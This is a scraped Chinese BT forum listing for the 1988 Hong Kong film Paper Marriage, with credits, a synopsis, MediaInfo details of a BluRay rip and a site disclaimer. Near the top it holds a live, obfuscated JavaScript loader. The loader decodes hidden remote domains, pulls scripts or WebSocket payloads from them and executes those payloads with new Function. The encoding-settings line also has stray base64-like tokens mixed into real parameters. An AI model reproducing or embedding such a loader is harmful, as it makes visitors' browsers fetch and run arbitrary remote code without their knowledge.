过埠新娘[国粤语音轨/中文字幕]Paper.Marriage.1988.1080p.BluRay.x264.FLAC.2.0.2Audio-迅雷下载 9.90GB

版主小s 14天前 325

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 过埠新娘 / 小白兔与大乌龟 / Paper Marriage

◎年 代 1988

◎产 地 中国香港

◎类 别 喜剧 / 动作

◎语 言 粤语

◎上映日期 1988-04-14

◎IMDb链接 https://www.imdb.com/title/tt0095264/

◎豆瓣评分 6.5/10 (1403人评价)

◎豆瓣链接 https://movie.douban.com/subject/1484140/

◎片 长 92分钟

◎导 演 张坚庭 Alfred Cheung (id:1016979)

◎编 剧 张坚庭 Alfred Cheung (id:1016979)

◎演 员 洪金宝 Sammo Hung Kam-Bo (id:1055887)

张曼玉 Maggie Cheung (id:1274231)

张坚庭 Alfred Cheung (id:1016979)

周比利 Billy Chow (id:1050501)

林建明 Meg Lam (id:1289297)

高丽虹 Joyce Godenzi (id:1285005)

陈友 Anthony Chan (id:1028948)

陈佩华 Jessica Chan Pooi-Wa (id:1372898)

顾嘉辉 Joseph Koo (id:1017256)

周锦祥 Gam Cheung Chow (id:1315803)

林正英 Ching-Ying Lam (id:1016823)

周少龙 Shao Lung Chou (id:1344862)

黄慧颐 Huiyi Huang (id:1357384)

◎标 签 张曼玉 / 香港 / 洪金宝 / 喜剧 / 香港电影 / 爱情 / 张坚庭 / 1988

◎简 介

小玉(张曼玉 饰)带上了自己的全部家当,只身一人来到美国,为的就是同相恋多年的未婚夫皮特(张坚庭 饰)相聚,然而,越过千山万水之后的小玉才发现,在美国,没有居住权的她事事举步维艰。

在皮特的怂恿之下,小玉决定通过假结婚来获得居住权,他们找到了落魄赌鬼钱宝(洪金宝 饰),希望能与他达成交易。就这样,小玉成为了钱宝的妻子。让小玉没有想到的是,仅仅一天之后,皮特就带着小玉的全部财产消失无踪,留下茫然的小玉和钱宝,不知该如何是好,刚开始,钱宝粗暴的将小玉赶出家本,但之后于心不忍,又再次收留了她,两个走投无路的倒霉鬼,在异国他乡该如何生存?

  1. General

  2. Unique ID : 247917678113214165000509384808807750704 (0xBA83353FA07CD5DB60364A7FE2175C30)

  3. Complete name : [email protected]DQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.90 GiB

  7. Duration : 1 h 32 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 15.4 Mb/s

  10. Movie name : Paper Marriage 1988

  11. Encoded date : UTC 2021-07-14 00:35:50

  12. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : AVC

  19. Format/Info : Advanced Video Codec

  20. Format profile : [email protected]

  21. Format settings : CABAC / 4 Ref Frames

  22. Format settings, CABAC : Yes

  23. Format settings, Reference frames : 4 frames

  24. Codec ID : V_MPEG4/ISO/AVC

  25. Duration : 1 h 32 min

  26. Bit rate : 14.1 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.284

  37. Stream size : 9.09 GiB (92%)

  38. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=34 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : FLAC

  45. Format/Info : Free Lossless Audio Codec

  46. Codec ID : A_FLAC

  47. Duration : 1 h 32 min

  48. Bit rate mode : Variable

  49. Bit rate : 614 kb/s

  50. Channel(s) : 2 channels

  51. Channel layout : L R

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 11.719 FPS (4096 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 405 MiB (4%)

  57. Title : Cantonese

  58. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : FLAC

  65. Format/Info : Free Lossless Audio Codec

  66. Codec ID : A_FLAC

  67. Duration : 1 h 32 min

  68. Bit rate mode : Variable

  69. Bit rate : 610 kb/s

  70. Channel(s) : 2 channels

  71. Channel layout : L R

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 11.719 FPS (4096 SPF)

  74. Bit depth : 24 bits

  75. Compression mode : Lossless

  76. Stream size : 402 MiB (4%)

  77. Title : Mandarin

  78. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No


  82. Text #1

  83. ID : 4

  84. ID in the original source medium : 4609 (0x1201)

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 1 h 28 min

  90. Bit rate : 32.2 kb/s

  91. Count of elements : 1842

  92. Stream size : 20.5 MiB (0%)

  93. Title : chs

  94. Language : Chinese

  95. Default : Yes

  96. Forced : No

  97. Original source medium : Blu-ray


  98. Text #2

  99. ID : 5

  100. ID in the original source medium : 4608 (0x1200)

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 28 min

  106. Bit rate : 33.2 kb/s

  107. Count of elements : 1840

  108. Stream size : 20.9 MiB (0%)

  109. Title : cht

  110. Language : Chinese

  111. Default : No

  112. Forced : No

  113. Original source medium : Blu-ray


  114. Text #3

  115. ID : 6

  116. ID in the original source medium : 4610 (0x1202)

  117. Format : PGS

  118. Muxing mode : zlib

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 1 h 28 min

  122. Bit rate : 31.1 kb/s

  123. Count of elements : 1840

  124. Stream size : 19.6 MiB (0%)

  125. Language : English

  126. Default : No

  127. Forced : No

  128. Original source medium : Blu-ray


  129. Menu

  130. 00:00:00.000 : Chapter 01

  131. 00:08:11.250 : Chapter 02

  132. 00:14:36.958 : Chapter 03

  133. 00:24:09.125 : Chapter 04

  134. 00:31:26.000 : Chapter 05

  135. 00:37:41.041 : Chapter 06

  136. 00:47:28.750 : Chapter 07

  137. 00:55:40.583 : Chapter 08

  138. 01:01:57.750 : Chapter 09

  139. 01:09:19.750 : Chapter 10

  140. 01:16:01.125 : Chapter 11

  141. 01:24:18.958 : Chapter 12





此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 动作 喜剧

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回